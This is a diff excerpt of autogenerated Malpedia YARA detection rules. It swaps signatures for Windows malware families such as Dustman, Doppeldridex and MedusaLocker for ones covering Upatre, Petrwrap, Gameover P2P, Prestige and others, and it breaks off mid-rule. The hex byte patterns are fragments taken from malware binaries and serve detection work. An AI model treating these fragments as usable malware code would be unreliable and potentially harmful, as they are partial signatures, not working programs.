"a79879d34246651b7f75532605ca94c4866e5edbca41b238eabaad9f54198dce" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -165365,32 +168164,46 @@ rule MALPEDIA_Win_Dustman_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488d150d620100 4b8d1c36 4c897710 4c8bc3 488bce } - $sequence_1 = { 448d4303 895c2428 488d0ddb720000 4533c9 4489442420 } - $sequence_2 = { 4903cb 48894d48 488bca 492bca 4c8d9dca010000 4903cb 48894d50 } - $sequence_3 = { 884803 420fb60c20 884804 420fb60c28 884805 0fb60c10 } - $sequence_4 = { f20f102d???????? f20f590d???????? f20f59ee f20f5ce9 f2410f1004c1 488d15767f0000 f20f1014c2 } - $sequence_5 = { 7405 e8???????? b001 4883c428 c3 488d158ba50000 } - $sequence_6 = { 492bca 4c8d9dcd010000 4903cb 48894d68 488bca 492bca 4c8d9dce010000 } - $sequence_7 = { 488d053f1f0000 498b0b 4889442450 488b85e0040000 4889442460 486385f0040000 } - $sequence_8 = { e8???????? 4885c0 7509 488d0597420100 eb04 4883c024 } - $sequence_9 = { 48c1e028 480bd8 0fb6852e020000 48c1e030 480bd8 0fb6852f020000 48c1e038 } + $sequence_0 = { 0118 e9???????? 6a00 6818200000 } + $sequence_1 = { 0118 e9???????? c745ec00000000 85db } + $sequence_2 = { 03c1 50 e8???????? 83c40c 8b45f0 } + $sequence_3 = { 8b421c 2b4218 660f6ec0 f30fe6c0 } + $sequence_4 = { 8b4214 2b4210 660f6ec0 f30fe6c0 } + $sequence_5 = { 0101 0101 0101 0202 0202 0200 } + $sequence_6 = { 69d200008f04 2bc8 c1e910 69c161a4f778 2bd0 } + $sequence_7 = { 0102 894dec 3bcb 7c85 } + $sequence_8 = { 7407 b901000000 eb0a 33c9 803f01 0f95c1 33c0 } + $sequence_9 = { 8b420c 2b4208 660f6ec0 f30fe6c0 } + $sequence_10 = { 034de8 894604 893e 8930 } + $sequence_11 = { 740f 0301 eb0b a801 } + $sequence_12 = { 03f1 ff15???????? 8b0d???????? 53 } + $sequence_13 = { 03c0 8985bcfbffff 8d85bcfbffff 6a00 } + $sequence_14 = { 8a4202 8841ff 8b02 c1e808 } + $sequence_15 = { 660f6e4104 f30fe6c0 84c0 7509 } + $sequence_16 = { 488d15e5980000 483305???????? 488bcb 488905???????? ff15???????? 488d15e7980000 483305???????? } + $sequence_17 = { e8???????? 4803db 4c8d3590fc0000 49833cde00 7407 } + $sequence_18 = { 837b0801 7524 4863c6 488d15551a0100 4533c0 488d0c80 ffc6 } + $sequence_19 = { 488905???????? ff15???????? 488d15f3980000 483305???????? 488bcb 488905???????? } + $sequence_20 = { 488d3d0cb8ffff 488bcf e8???????? 85c0 } + $sequence_21 = { 488d1552fb0000 483950f0 740c 488b10 4885d2 7404 f044010a } + $sequence_22 = { 0f8c65030000 488d3534ac0000 4883ee60 4585ed 0f843f030000 } + $sequence_23 = { 3b0d???????? 7367 4863c1 4c8d354acd0000 488bf8 83e01f 48c1ff05 } condition: - 7 of them and filesize <368640 + 7 of them and filesize <7599104 } -rule MALPEDIA_Win_Doppeldridex_Auto : FILE +rule MALPEDIA_Win_Yahoyah_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0bf161f5-a608-54fc-8493-d0ca4c837703" + id = "8071f7bc-1af0-58b6-8984-8add890e5a04" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doppeldridex_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yahoyah_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "fb6ff8ebf9c5a6a0d85322be3122e60be6bc024bdfc953709614ec984b12824b" + logic_hash = "5a0539481a7f5653801a561ffa29165f1f4bf92248a27b13820a8f2035c6eb1c" score = 75 quality = 75 tags = "FILE" @@ -165404,38 +168217,37 @@ rule MALPEDIA_Win_Doppeldridex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 01501c 015020 015024 01500c } - $sequence_1 = { 33d2 3b7c2414 0f4cd3 032c24 03ee 2bea 8bc5 } - $sequence_2 = { 011483 40 3b06 7cf8 } - $sequence_3 = { 010c28 8b4e04 42 8d41f8 d1e8 } - $sequence_4 = { 017c240c 3b5c2408 0f822affffff ff74240c } - $sequence_5 = { 030c24 0fbe01 88442458 85c0 } - $sequence_6 = { 01500c 833920 751c 8bc1 } - $sequence_7 = { 0306 894218 47 3b7c2408 } - $sequence_8 = { 7508 8b45f8 83c40c 5d c3 } - $sequence_9 = { 8b459c 83c474 5e 5f 5b } - $sequence_10 = { 5e 5f 5d c3 8b45e4 8b4dec 8a1401 } - $sequence_11 = { 8945e0 74c2 eb9b 8b45f0 353857544f } - $sequence_12 = { 0fb7c7 89442408 894c240c 8b45ac } - $sequence_13 = { 8b4da0 83f900 898570ffffff 0f840c010000 e9???????? } - $sequence_14 = { 7452 eb22 668b45c6 66c1e801 0fb7c8 } - $sequence_15 = { 8b5dbc 891c24 89442404 0fb7c7 } + $sequence_0 = { ff15???????? 6a02 53 6af0 } + $sequence_1 = { 50 6800080000 ff15???????? ff15???????? } + $sequence_2 = { 53 53 56 53 ff15???????? 68d0070000 } + $sequence_3 = { 50 e8???????? 83c418 6a02 53 } + $sequence_4 = { ff15???????? 6a2e 68???????? e8???????? } + $sequence_5 = { e8???????? 59 53 53 6a03 0fb7c8 } + $sequence_6 = { 52 c1e808 23c1 50 68???????? } + $sequence_7 = { ff15???????? 85c0 7501 c3 56 } + $sequence_8 = { 23d1 52 8bd0 c1ea18 52 0fb6d0 } + $sequence_9 = { eb19 ff15???????? 0fb7c0 50 68???????? } + $sequence_10 = { 6a1a 50 e8???????? bf???????? } + $sequence_11 = { ff15???????? 6a3a 56 e8???????? 8bf0 83c410 } + $sequence_12 = { 90 33c9 33c0 648b3530000000 8b760c } + $sequence_13 = { 90 68add13441 ffb53ffbffff 6a00 e8???????? 898521f1ffff e8???????? } + $sequence_14 = { 90 90 90 90 90 68add13441 ffb53ffbffff } condition: - 7 of them and filesize <360448 + 7 of them and filesize <483328 } -rule MALPEDIA_Win_Grabbot_Auto : FILE +rule MALPEDIA_Win_Upatre_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02308264-bf9f-5ce5-8d58-a146011d85f3" + id = "1628c1f9-1d48-5501-a98b-2c8f976e35eb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grabbot_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.upatre_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "fb36fa0cb6c01a8c284e94b423e764f2d45ce7cf14719bff3ffb20003d9572f1" + logic_hash = "ec286f640db5a5b7bffd2eededa524e0947ea3452d78b30e2aeb2f315c32ce53" score = 75 quality = 75 tags = "FILE" @@ -165449,38 +168261,38 @@ rule MALPEDIA_Win_Grabbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb702 83f85a 770b 83f841 7206 } - $sequence_1 = { 83f85a 770d 83f841 7208 83c020 } - $sequence_2 = { 83f841 7206 83c020 0fb7c0 83c202 } - $sequence_3 = { ffd0 c3 b88dbdc13f 50 e8???????? } - $sequence_4 = { ffe0 c3 c3 c3 68b9be7238 e8???????? 50 } - $sequence_5 = { 03c7 813850450000 0f853c010000 0fb74804 ba4c010000 } - $sequence_6 = { 03c3 813850450000 8945f8 7408 32c0 } - $sequence_7 = { 7523 8b8c18a0000000 85c9 0f8489000000 837c187405 } - $sequence_8 = { 56 ffd0 33c9 66894c37fe } - $sequence_9 = { 7428 8b0d???????? 8908 8b0d???????? 894804 } - $sequence_10 = { 89480c e9???????? 33c0 e9???????? } - $sequence_11 = { 894808 8b0d???????? 89480c e9???????? } - $sequence_12 = { 8bf0 85f6 741d 8d4601 50 e8???????? } - $sequence_13 = { 85c0 56 0f9fc3 e8???????? 83c414 } - $sequence_14 = { ff15???????? a3???????? 85c0 7505 83c8ff } - $sequence_15 = { 741b 8d440002 50 e8???????? } + $sequence_0 = { 66ab 33c0 66ab bbff0f0000 8b75f0 } + $sequence_1 = { 8945fc 8bd8 03c1 8bf8 33c0 } + $sequence_2 = { 894d90 8b4d8c 85c9 7501 c3 57 } + $sequence_3 = { 7414 4e 56 ff75f0 } + $sequence_4 = { 0430 66ab 81c60e010000 ac } + $sequence_5 = { 8945ec 6a00 8d4dc0 51 ff75e0 ff75bc ff75ec } + $sequence_6 = { 895d98 8bfb 03d8 b91c010000 } + $sequence_7 = { b900100000 03c1 8945f0 03c1 } + $sequence_8 = { 83c008 8945bc 8b4dbc 8b5104 52 } + $sequence_9 = { 8b55d4 8b440a1c 8945f4 8b4df0 } + $sequence_10 = { 0f94c0 85c0 7436 8b4dd8 83c102 2b4de8 } + $sequence_11 = { e3c9 1bb6aeaca844 bbcdcc70e8 739c d4ef } + $sequence_12 = { eb2b 8b4df4 8b510c 52 e8???????? 83c404 0fb7c0 } + $sequence_13 = { 8b4508 0345f0 0fbe08 8b5510 0faf55f8 0faf55f0 33ca } + $sequence_14 = { 8945dc 8b4ddc 668b11 668955f0 0fb745f0 } + $sequence_15 = { 894df4 8b55f4 3b550c 7d28 } condition: - 7 of them and filesize <1335296 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Meduza_Auto : FILE +rule MALPEDIA_Win_Petrwrap_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e4f4d329-00f5-5eac-b6fa-1a17dabc236f" + id = "335058f1-6093-5213-b714-ccf692d43a50" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.meduza_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.petrwrap_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "5c31e3491e238f84a3f72990d6fa7fa5c8ed914b3efa6ee6f598848d375c51b9" + logic_hash = "3085058da5fe07c21c7301994557a19255100cfc23f593064f4716726b348a1c" score = 75 quality = 75 tags = "FILE" @@ -165494,32 +168306,32 @@ rule MALPEDIA_Win_Meduza_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75c8 8d55ac c645fc01 8d8d78ffffff e8???????? 83c404 8d4d94 } - $sequence_1 = { c645fc23 c785f8eaffff02000000 c78548f8ffff3ebfeb85 c7854cf8ffff59dea06d 8b8548f8ffff 8b8d4cf8ffff 898d04f3ffff } - $sequence_2 = { 83c408 c645fc15 8b4590 3b4580 0f84e9020000 66660f1f840000000000 8d7020 } - $sequence_3 = { 8d45e0 c645fc02 50 e8???????? 8b4de4 83c404 8bf8 } - $sequence_4 = { 898538f4ffff 898d3cf4ffff c785d8f6ffffdf03fddd c785dcf6ffffe227d929 8b85d8f6ffff 8b8ddcf6ffff 898540f4ffff } - $sequence_5 = { 898de4feffff 8985e0feffff c78558ffffff0d5f1759 c7855cfffffff2314621 8b8558ffffff 8b8d5cffffff 898decfeffff } - $sequence_6 = { c78548f8ffff68297235 c7854cf8ffff9d412b44 8b8548f8ffff 8b8d4cf8ffff 898dbcf5ffff 8985b8f5ffff c78548f8ffff5fcb84e8 } - $sequence_7 = { 898ddce7ffff c785d8e4ffffdf03fddd c785dce4ffffe227d929 8b85d8e4ffff 8b8ddce4ffff 8985e0e7ffff } - $sequence_8 = { e9???????? 807b0c00 0f8485010000 6a02 68???????? ff5004 8b4314 } - $sequence_9 = { c7854cf8ffff9d412b44 8b8548f8ffff 8b8d4cf8ffff 0f288d90f4ffff 898dfcfbffff 8d8d90f4ffff 8985f8fbffff } + $sequence_0 = { f7e9 c1fa02 8bc2 c1e81f 40 03c2 687f010000 } + $sequence_1 = { 136c2414 894c2428 8b4c246c 896c2420 8d4960 e8???????? 8b4c2440 } + $sequence_2 = { 50 57 57 c744242400000000 c744242800000000 c744242c00000000 c744243800000000 } + $sequence_3 = { 8b7c2418 f7c3fcffffff 0f8496000000 897c2420 8d4900 6a00 56 } + $sequence_4 = { 53 53 896c2448 8844241f 660fd6442454 e8???????? 83c40c } + $sequence_5 = { 8bca 83d100 01460c 8b442424 83d100 83c310 83ed04 } + $sequence_6 = { 89460c 8b06 53 55 8b2f 8b7f04 33db } + $sequence_7 = { 8b7c2444 33fb 237c2434 23cb } + $sequence_8 = { 897db0 6a00 ff75c8 ff55d8 6a00 6a16 } + $sequence_9 = { 7f04 8bc5 eb0e 56 55 e8???????? 8b54242c } condition: - 7 of them and filesize <1433600 + 7 of them and filesize <1024000 } -rule MALPEDIA_Win_Bookcodesrat_Auto : FILE +rule MALPEDIA_Win_Uacme_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "12c3f4c8-ae45-5c42-aff9-36df89db636e" + id = "f5c3a5f2-a252-5543-b1be-134e5f419833" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bookcodesrat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.uacme_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "4448935151876512796b7de65b4c6301493ba2a3fb6e7bb9bd7b534c17d01712" + logic_hash = "9cc750a1f13cae79bcf2cd2e379aedeb4cbdf45f9813c77d239c596ff07109f6" score = 75 quality = 75 tags = "FILE" @@ -165533,32 +168345,32 @@ rule MALPEDIA_Win_Bookcodesrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 488d0d97900100 ff15???????? 833d????????00 750a b901000000 e8???????? } - $sequence_1 = { 33c0 48c7471807000000 48894710 668907 4883c728 493bfe 75d7 } - $sequence_2 = { 488b5c2430 488b742438 4883c420 5f c3 482bf3 66660f1f840000000000 } - $sequence_3 = { 4883c9ff 33c0 488dbb40080000 66f2af 48f7d1 48ffc9 74e8 } - $sequence_4 = { 0f858a000000 ba04010000 488bce ffd7 85c0 744e 33c0 } - $sequence_5 = { 0f1f440000 ffc6 4c8b4310 4883c8ff 492bc0 4883f801 0f868a000000 } - $sequence_6 = { 75ee 488d8d50010000 33d2 41b808020000 e8???????? 488b4c2438 488d442430 } - $sequence_7 = { 488d4c2420 ba04010000 ff15???????? 33c0 4883c9ff 488d7c2420 66f2af } - $sequence_8 = { ff15???????? 418985a8010000 32db 48897c2430 897c2428 897c2420 4533c9 } - $sequence_9 = { 4863c2 4c8bc1 8bd1 888c0560080000 6690 420fb68405a0020000 49ffc0 } + $sequence_0 = { ba???????? e8???????? 8d8df0fbffff e8???????? 8bf8 85ff 741b } + $sequence_1 = { ff9620060000 33c0 5e 8be5 5d c20400 } + $sequence_2 = { eb23 8b4d08 e8???????? 03c0 } + $sequence_3 = { 8d45d8 50 6804900000 56 ff15???????? 6808700000 56 } + $sequence_4 = { ba???????? 8d8940040000 e8???????? 8b45fc ff7010 ffd6 } + $sequence_5 = { 8bd8 85db 74d3 8b5508 8bcb e8???????? } + $sequence_6 = { 668974242e ff15???????? 85c0 0f88c9040000 ff15???????? b940040000 } + $sequence_7 = { e8???????? 8bce 8d85e0fbffff 8818 40 83e901 } + $sequence_8 = { b9???????? e8???????? 6683bdf0fbffff00 8bf0 740d 8d85f0fbffff 50 } + $sequence_9 = { 8d85f0fbffff 50 8d85e0f7ffff 50 e8???????? 8bd8 } condition: - 7 of them and filesize <544768 + 7 of them and filesize <565248 } -rule MALPEDIA_Win_Getmypass_Auto : FILE +rule MALPEDIA_Win_Halfrig_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "083431d4-35f0-5afc-be73-c4abda9f956c" + id = "4f3cbac9-fb70-5f5f-a1a6-aa00243a3db8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.getmypass_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.halfrig" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.halfrig_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "73655fc056c3c045e75de418123d8e1cd087892e700c185d02f9fb25dda3b86c" + logic_hash = "fd3e289580ee05538ff1447ee4a76bbaba1a2cf6f44fe795cbd300f7fc8296a1" score = 75 quality = 75 tags = "FILE" @@ -165572,32 +168384,32 @@ rule MALPEDIA_Win_Getmypass_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c201 8955fc ebcb 837dfc05 7e04 b001 eb02 } - $sequence_1 = { 0fb64d08 85c9 7418 8b9594fdffff 52 } - $sequence_2 = { 68???????? 68???????? e8???????? 83c408 8945fc 837dfc00 7463 } - $sequence_3 = { 6a00 8b45f8 50 ff15???????? e8???????? } - $sequence_4 = { 8945f4 837df400 742d 8b55f4 0fb702 83f831 750c } - $sequence_5 = { e8???????? 83c404 a3???????? 8b55f8 52 e8???????? 83c404 } - $sequence_6 = { 83f835 7409 0fbe4d08 83f934 } - $sequence_7 = { e8???????? 83c404 8945fc 837dfcff 740e } - $sequence_8 = { 8b55f8 8b4204 2b450c 8b4df8 0301 50 } - $sequence_9 = { 83f801 7509 c745e400000000 eb17 8b5508 83c201 } + $sequence_0 = { 833d????????ff 752a 488d0dee900400 c705????????679f9b01 c705????????6680ec92 c705????????3f7d27f5 e8???????? } + $sequence_1 = { 833d????????ff 7539 488d0d67740400 66c705????????fd01 c705????????6881e28d } + $sequence_2 = { e8???????? 488d0d6c950700 e8???????? 40383d???????? 7435 660f1f440000 } + $sequence_3 = { 75ad 0fb600 498bcf 8802 488d542420 e8???????? 488d0d58c70600 } + $sequence_4 = { 48c1e008 488bd1 49ffc0 4833d0 4983f80f 72db 408835???????? } + $sequence_5 = { 8802 488d542420 e8???????? 488d0d4cef0900 e8???????? 40383d???????? } + $sequence_6 = { 488d542420 e8???????? 488d0d08830600 e8???????? 40383d???????? 7435 488bd3 } + $sequence_7 = { 75ad 0fb600 498bcf 8802 488d542420 e8???????? 488d0df8da0500 } + $sequence_8 = { 8802 488d542420 e8???????? 488d0df8930600 e8???????? 40383d???????? } + $sequence_9 = { 488d0d88080800 e8???????? 40383d???????? 7435 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <1369088 } -rule MALPEDIA_Win_Powerduke_Auto : FILE +rule MALPEDIA_Win_Gameover_P2P_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6d856194-c9fe-5330-9bd8-d5a96e01d2f2" + id = "f23c7d41-302b-54ee-89d3-a1fcd7481d37" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powerduke_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gameover_p2p_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "8396f645fb90ff46635658086ca415f6d857b1da2dac7ff489b34d4ef5885286" + logic_hash = "15df0db5593f1e0961da9a214002cfa7e3553ad059d6ba39628050e96c9953a2" score = 75 quality = 75 tags = "FILE" @@ -165611,32 +168423,32 @@ rule MALPEDIA_Win_Powerduke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c705????????00000000 6a04 6800300000 ff7518 } - $sequence_1 = { ff75e4 ff75bc ff15???????? 09c0 7473 } - $sequence_2 = { 6a00 ff15???????? 09c0 0f8412010000 8945e4 53 50 } - $sequence_3 = { b801000000 c9 c20c00 55 89e5 81ec080c0000 } - $sequence_4 = { 89f7 31c9 803c0f3a 7409 } - $sequence_5 = { 09c0 7505 b850000000 8945ec c6040e00 } - $sequence_6 = { c70000000000 837d2000 740f 8b4520 } - $sequence_7 = { c20400 55 89e5 56 57 8b750c } - $sequence_8 = { 0f8493000000 c745f901000000 89c3 be???????? } - $sequence_9 = { 6a00 57 ff15???????? 09c0 } + $sequence_0 = { 8b01 8975dc 85c0 740f ffb09c010000 8d45d4 50 } + $sequence_1 = { 8d873c010000 50 889f38010000 ffd6 } + $sequence_2 = { ba???????? 8d8d70fdffff e8???????? 85c0 0f95c0 84c0 7509 } + $sequence_3 = { 743f 53 8d442420 50 57 56 ff742428 } + $sequence_4 = { 7769 8a442412 0fb6c0 668901 8a442413 0fb6c0 66894102 } + $sequence_5 = { 7415 ff770c 8d442418 51 } + $sequence_6 = { e8???????? 8bf8 689a000000 8bd3 8bce 897c242c } + $sequence_7 = { b9a6000000 8d5588 e8???????? e8???????? 8bc8 e8???????? 8b750c } + $sequence_8 = { 85c0 7548 68???????? ff35???????? ffd6 85c0 7537 } + $sequence_9 = { f3ab 33db 6818010000 66ab 8d842410010000 53 50 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <598016 } -rule MALPEDIA_Win_Http_Troy_Auto : FILE +rule MALPEDIA_Win_Ddkong_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e1b34482-29c1-5d78-b5ec-9dc58faf8306" + id = "0544faa5-2134-56f3-b2ce-99d63d7f2f59" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.http_troy_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ddkong_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "772a93ccc4b452bdc4c7e0291c378f7eec15f191b5f119cfc79098a0f26a733e" + logic_hash = "5c0b95ff5255c02a1d1a9b0883f78a353561d54588ac72196452124efb25472a" score = 75 quality = 75 tags = "FILE" @@ -165650,32 +168462,32 @@ rule MALPEDIA_Win_Http_Troy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { dd45f8 dae9 59 59 dfe0 f6c444 7a05 } - $sequence_1 = { c3 8b8384400000 85c0 0f84bd010000 8b54240c 52 8b542414 } - $sequence_2 = { ff00 85d2 744e 8d45ec 50 53 8bcf } - $sequence_3 = { 8b4c2420 b801000000 89410c 8b4c2418 5f 5e e8???????? } - $sequence_4 = { 56 57 e8???????? 59 59 eb7d dd4508 } - $sequence_5 = { 83c604 3b742408 72ef 5e c3 56 8bf0 } - $sequence_6 = { 6a01 68???????? ffd3 85c0 0f857afeffff 393cb5c8540310 742e } - $sequence_7 = { 50 8d4c240c 51 6a00 683f000f00 6a00 } - $sequence_8 = { e8???????? 8b0d???????? 83c408 3bc1 741f 83c702 } - $sequence_9 = { e8???????? 83c41c 8d942418010000 52 ffd3 85c0 7430 } + $sequence_0 = { c6459765 c6459857 c645996f c6459a77 c6459b36 c6459c34 c6459d46 } + $sequence_1 = { c68572ffffff62 c68573ffffff6a c68574ffffff65 c68575ffffff63 c68576ffffff74 889d77ffffff ffd7 } + $sequence_2 = { c645d36c c645d465 c645d54e c645d661 c645d76d c645d865 c645d941 } + $sequence_3 = { 5b 5d c20c00 ff25???????? ff25???????? 8b4c2404 85c9 } + $sequence_4 = { c645f470 ffd6 50 ffd7 8b5d0c bf04010000 } + $sequence_5 = { 6a04 e8???????? 83c418 eb2d 6a01 } + $sequence_6 = { 7427 837d08ff 7421 8d45dc 6a10 50 ff7508 } + $sequence_7 = { c6855affffff65 c6855bffffff4f c6855cffffff62 c6855dffffff6a c6855effffff65 } + $sequence_8 = { c6459763 c6459874 c6459969 c6459a76 c6459b65 c6459c43 c6459d6f } + $sequence_9 = { c68574ffffff65 c68575ffffff63 c68576ffffff74 889d77ffffff } condition: - 7 of them and filesize <475136 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Tokyox_Auto : FILE +rule MALPEDIA_Win_Newpass_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6ca744f8-6e83-57d0-b9b1-d948cf62f189" + id = "dfd78470-0c07-5107-9bdf-99560c1551b3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tokyox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tokyox_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newpass" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newpass_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "6c96cc95cf53b382f98148013ad4ad66eb649ce28d4ba112298bfa55f06ac1c7" + logic_hash = "18487b3a938727b19644b6d1320bc7ccc85217d142f24fc2488ac5f5fe73de66" score = 75 quality = 75 tags = "FILE" @@ -165689,32 +168501,32 @@ rule MALPEDIA_Win_Tokyox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6685c0 75e8 8d8570ffffff 8bf0 } - $sequence_1 = { bb0f000000 8975d8 8975e8 51 68ffff0000 50 } - $sequence_2 = { ff15???????? 85c0 0f8456010000 837d1000 751b 68c8000000 } - $sequence_3 = { 8d4598 8bcb 50 6888130000 8d45dc 50 e8???????? } - $sequence_4 = { 8d854cf5ffff 50 68???????? ff15???????? } - $sequence_5 = { 0f114590 0f104010 0f1145c0 0f1145a0 } - $sequence_6 = { ff730c ffd7 e9???????? 8d8550ffffff 0f57c0 50 0f114310 } - $sequence_7 = { 8d85f0faffff c645a000 50 ff75a0 8d4de8 } - $sequence_8 = { 8bf8 56 53 57 e8???????? 0f1045d0 } - $sequence_9 = { 668903 8d5101 8a01 41 84c0 75f9 ff75f8 } + $sequence_0 = { 4d8bc4 eb0f 4983c8ff 49ffc0 6642833c4700 75f5 488bd7 } + $sequence_1 = { 488d542470 48837d8810 480f43542470 488b5910 4883791810 7203 } + $sequence_2 = { 85c0 792e 488b842490000000 4889442428 4c8bce 440fb6c7 488d542470 } + $sequence_3 = { eb09 418bc7 493bf6 0f95c0 85c0 7906 488b7f10 } + $sequence_4 = { 7503 488b07 483bc8 741b 448bc2 488bd0 e8???????? } + $sequence_5 = { c7411006160000 8b4110 0f49c2 488939 894110 b001 } + $sequence_6 = { 488bcb e8???????? 84c0 753d 488bcb e8???????? 3a4500 } + $sequence_7 = { 4c0f44ca 41397920 7340 498b4110 488bd3 498bca } + $sequence_8 = { 7410 4c8bce 488bc8 e8???????? 488bd8 eb03 498bdd } + $sequence_9 = { 807a1900 7525 488bc2 488b12 807a1900 7539 6666660f1f840000000000 } condition: - 7 of them and filesize <237568 + 7 of them and filesize <2654208 } -rule MALPEDIA_Win_Medusalocker_Auto : FILE +rule MALPEDIA_Win_Prestige_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ffdd3261-a5ad-520b-a2bf-3c67ba3f2e25" + id = "554de8b7-e6ad-5535-8c14-f95b90ec653d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.medusalocker_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prestige_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "1d388adf94671d416a3d4bdcd878fd62d77b06e7650d468b56f2c1b04655aed4" + logic_hash = "3d9139c6507e377e5a1b52cf299e6f205e8499ed341925da786360ebd802ec9b" score = 75 quality = 75 tags = "FILE" @@ -165728,32 +168540,32 @@ rule MALPEDIA_Win_Medusalocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8945e8 eb07 c745e800000000 8b4de8 894de4 c645fc02 } - $sequence_1 = { 8b4dd4 e8???????? 